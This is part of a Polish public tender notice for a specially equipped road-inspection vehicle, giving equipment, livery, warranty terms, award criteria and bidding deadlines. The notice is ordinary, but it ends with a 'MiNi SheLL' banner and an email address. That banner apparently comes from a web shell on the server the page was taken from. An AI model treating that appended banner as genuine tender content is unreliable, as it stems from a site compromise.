Lampy wyposażone dodatkowo w lampy typu LED  pomarańczowe oraz białe ( oświetlenie tylnego przedpola) podłączone do instalacji pojazdu bazowego  lampy żółte połączone z kierunkowskazami pojazdu, lampy czerwone z lampami STOP.
Zasilanie z akumulatora rozruchowego.
Całkowita wysokość wyżej opisanej belki świetlnej nie powinna przekraczać 130mm.
Pas odblaskowy barwy białej opasający pojazd, o szerokości od 80 do 120 mm, znajdujący się w połowie wysokości pomiędzy dolną krawędzią okien a progiem pojazdu. 
Napis INSPEKCJA TRANSPORTU DROGOWEGO barwy białej, umieszczony po obu stronach samochodu nad pasem odblaskowym barwy białej. Logo Inspekcji Transportu Drogowego na bocznych drzwiach kierowcy i pasażera z folii samoprzylepnej.
Napis INSPEKCJA TRANSPORTU DROGOWEGO koloru czarnego z przodu samochodu oraz na tylnych drzwiach. Na poszyciu  pojazdu mają zostać umieszczone 3 (trzy) numery taktyczne floty. Dwa umieszczone po lewej i prawej stronie pojazdu nad pasem odblaskowym w  tylnej części pojazdu. Trzeci numer umieszczony na tylnych drzwiach pojazdu z prawej strony.
Okres gwarancji na samochód - co najmniej 24 miesiące bez limitu km. Oferowany okres gwarancji nie może być uzależniony od wniesienia dodatkowych opłat przez zamawiającego.
Okres gwarancji na zabudowę, w tym dodatkową instalację elektryczną - nie mniej niż 24 miesiące. Naprawy gwarancyjne w miejscu użytkowania samochodu. Czas reakcji od czasu zgłoszenia usterki nie dłuższy niż 48 godzin.
Gwarancja na nadwozie (części blacharskie i lakiernicze) - co najmniej 3 lat. Oferowany okres gwarancji nie może być uzależniony od wniesienia dodatkowych opłat przez Zamawiającego.
Czas reakcji serwisu od czasu zgłoszenia usterki nie dłuższy niż 48 godzin. Oferowany  okres gwarancji nie może być uzależniony od wniesienia dodatkowych opłat przez Zamawiającego.
Sieć autoryzowanych stacji obsługi (ASO) na terenie całej Polski co najmniej jedna stacja w każdym województwie lub w innym województwie w odległości nie większej niż 150 km od miasta wojewódzkiego w województwie, w którym nie ma autoryzowanej stacji obsługi.
Serwis pojazdu realizowany w najbliższym ASO dla siedziby Zamawiającego: nazwa firmy, adres, telefon, e-mail (podać)
Serwis zabudowy realizowany przez: nazwa firmy, adres, telefon, e-mail (podać).
Koło zapasowe pełnowymiarowe , podnośnik, klucz do zmiany koła.
Centralny zamek sterowany pilotem.
Immobiliser.
Tempomat
Trójkąt, gaśnica (min. 2kg zamontowana w przedziale kierowcy i gaśnica  min. 6 kg zamontowana w przedziale magazynowym-  zamontowane w uchwycie fabrycznym, w przypadku braku uchwytu fabrycznego wymagany uchwyt do gaśnicy), lewarek, apteczka, komplet dywaników gumowych, min 2 komplety kluczyków.
Radio z CD wraz z instalacją radiową +głośniki+ możliwość uruchomienia radia bez zapłonu samochodu.
Apteczka wyposażona w:
1.	środki odkażające:
- woda utleniona- 1 szt.
-spirytus salicylowy 1 szt.
2. materiały opatrunkowe:
      - kompresy jałowe wym. 5x5 cm  2 op.
      -  kompresy jałowe wym. 9x9 cm  2 op.
      - opaska dziana szer. 5 cm  2 szt.
      - opaska dziana szer. 12 cm  2 szt.
      - gaza jałowa 1mx1m,
      - zestaw plastrów z opatrunkiem na folii 
      - opaska elastyczna szer. 12 cm  1 szt.
      - opaska elastyczna szer. 15 cm  1 szt.  
3. Rękawiczki lateksowe : 2 pary.
4. Nożyczki : 1 szt.
5. Roztwór soli fizjologicznej: 
        -0,9%NaCl  250 ml szt.1.
        -0,9%NaCl  10 ml szt.5.
6. Maseczka jednorazowa do sztucznego oddychania.
7. Koc ratunkowy/folia termiczna.
8. Szyna Kramera duża-1 szt., mała-1 szt. 
Urządzenie do wybijania szyb  samochodowych  -młotek bezpieczeństwa - 2 sztuki,  jedna zamontowana w kabinie kierowcy nad lewymi drzwiami przymocowane na stałe do poszycia wewnętrznego pojazdu , druga w przedziale biurowym.
Nóż do ciecia pasów zamontowany w przedziale kierowcy
Dodatkowy komplet opon letnich  z felgami stalowymi.
Chlapacze przednie i tylne.
Antena  dookólna w standardzie LTE z wtykiem podwójnym SMA wyprowadzonym w miejscu posadowienia modemu GSM  w prawym górnym rogu przy bocznej ściance od strony wewnętrznej przy miejscu na  drukarkę.
Wykonawca przed wykonaniem zabudowy przedziału biurowego                             i magazynowego uwzględni wskazania Zamawiającego i uzyska akceptację  na:

- planowane rozmieszczenie siedzisk oraz mebli, w tym rodzaj użytych materiałów ,
- planowaną kolorystykę,
- planowaną zabudowę w części magazynowej pojazdu.  

Pisemne zobowiązanie wykonawcy o dostarczeniu przy odbiorze pojazdu  świadectwa zgodności dla pojazdu skompletowanego gwarantującego rejestrację pojazdu jako specjalny.
Dokumenty do przekazania zamawiającemu:
- schematy elektryczne zabudowy,
-instrukcje demontażu  zabudowy,
- faktura,
-książka serwisowa pojazdu,
-homologacja na pojazd skompletowany.
- wykaz stacji ASO,
<br /><br /><b>II.5) Główny kod CPV: </b>34114000-9<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 22/12/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                 Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                 Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                 Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Listę podmiotów należących do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. Nr 50, poz. 331, ze zm.) albo informacja o tym, że wykonawca nie należy do grupy kapitałowej (w przypadku składania oferty przez wykonawców na zasadach określonych przepisem art. 23 ustawy - składających ofertę wspólnie - wyżej wymienione oświadczenie musi być złożone przez każdego wykonawcę.
Wykaz dostaw.Polisa ubezpieczeniowa.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br />
                  z kilkoma wykonawcami
                <br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>gwarancja napojazd</td><td>11</td></tr><tr><td>gwarancja na zabudowę</td><td>11</td></tr><tr><td>gwarancja na powłoki lakernicze </td><td>11</td></tr><tr><td>rok produkcji</td><td>7</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 05/09/2016, godzina: 11:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com